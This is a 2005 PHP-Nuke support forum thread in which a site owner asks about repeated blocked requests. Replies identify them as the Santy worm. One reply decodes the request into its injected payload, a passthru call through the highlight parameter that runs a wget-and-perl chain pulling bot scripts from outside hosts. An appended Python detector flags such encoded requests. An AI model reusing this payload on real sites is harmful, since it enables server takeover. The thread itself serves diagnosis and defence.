Ravens PHP Scripts: Forums
 

 

FatGiant
New Member



Joined: Jan 09, 2005
Posts: 13

Posted: Sun Jan 09, 2005 8:08 am

For several days, Sentinel has been blocking this script in one of my sites.

I'm pleased for it, but worried that at any moment they can find how to break this protection and get whatever they are trying to get.

This is what Sentinel reports to me, I ask your help in deciphering what it is and what they want, and, if possible, what can I do to keep protection.

Quote:
Blocked IP: 216.12.200.109
User ID: Anónimo (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.65
Query String: emergencias.portaisvivos.net/modules.php?name=Forums&rush=%65%
63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
mkdir%20.temp22;cd%20.temp22;wget%20 [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F
%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72
%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52
%53%5B%72%75%73%68%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 216.12.200.109
Remote Port: 55016
Request Method: GET


There were at the moment 100 of these attempts. What can I possibly do?

The website is : http://emergencias.portaisvivos.net using Nuke 7 PT.

Thank you for your time...

p.s.: In the quote I had to break the string into several lines, but in the report they are connected...
 
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Sun Jan 09, 2005 9:18 am

It's the Santy worm. See [ Only registered users can see links on this board! Get registered or login! ] for a more thorough protection scheme.
 
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496

Posted: Sun Jan 09, 2005 9:20 am

Translates like this:
Code:


/modules.php?name=Forums&rush=e%
63ho _START_; cd /tmp;
mkdir .temp22;cd .temp22;wget
http://www.quasi-sane.com/pics/bot.htm;wget
http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;
perl bot.htm;rm bot.htm; echo _
END_&highlight=%27.passthr
u($HTTP_GET_VAR
S[rush]).%27\';


To reduce the reports you can block it using mod rewrite which is well covered in the santy threads.

_________________
openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR | GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30
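
The decoding done by hand in the thread above, as an added example that is not part of any post or of NukeSentinel: it percent-decodes each parameter layer by layer and reports the three things visible in the blocked request (a double-encoded quote, a PHP execution call, and the second parameter that call reads). The function names and the `SAMPLE` string are assumptions made for illustration; `SAMPLE` is constructed from the pattern in the report with a harmless command.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the blocked request; the command is a bare echo.
SAMPLE = ("name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F"
          "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45"
          "%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527")

# PHP functions that run shell commands or evaluate code.
PHP_EXEC = re.compile(
    r"\b(passthru|system|shell_exec|exec|popen|proc_open|eval)\s*\(", re.I)
# Request arrays a PHP payload can use to pull in a second parameter.
PHP_INPUT = re.compile(
    r"\$(?:HTTP_GET_VARS|_GET|_REQUEST)\[\s*['\"]?(\w+)", re.I)
MAX_LAYERS = 5  # assumption: stop decoding after this many passes


def decode_layers(value):
    """Percent-decode until the text stops changing.

    Returns (text, layers); layers >= 2 means the value was encoded
    more than once, e.g. %2527 -> %27 -> '.
    """
    layers = 0
    while layers < MAX_LAYERS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def inspect_query(query):
    """Return findings for one raw (still encoded) query string."""
    findings = []
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    for name, raw in params.items():
        text, layers = decode_layers(raw)
        if layers >= 2 and "'" in text:
            findings.append(f"{name}: double-encoded quote")
        if PHP_EXEC.search(text):
            findings.append(f"{name}: PHP execution call")
        for ref in PHP_INPUT.findall(text):
            if ref in params:
                carried, _ = decode_layers(params[ref])
                findings.append(f"{name}: runs parameter '{ref}' -> {carried!r}")
    return findings


if __name__ == "__main__":
    print("\n".join(inspect_query(SAMPLE)))
```

A search term with an ordinary single-encoded apostrophe (`highlight=it%27s`) produces no findings, so the double-encoding check does not flag normal forum searches.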
All times are GMT - 6 Hours
 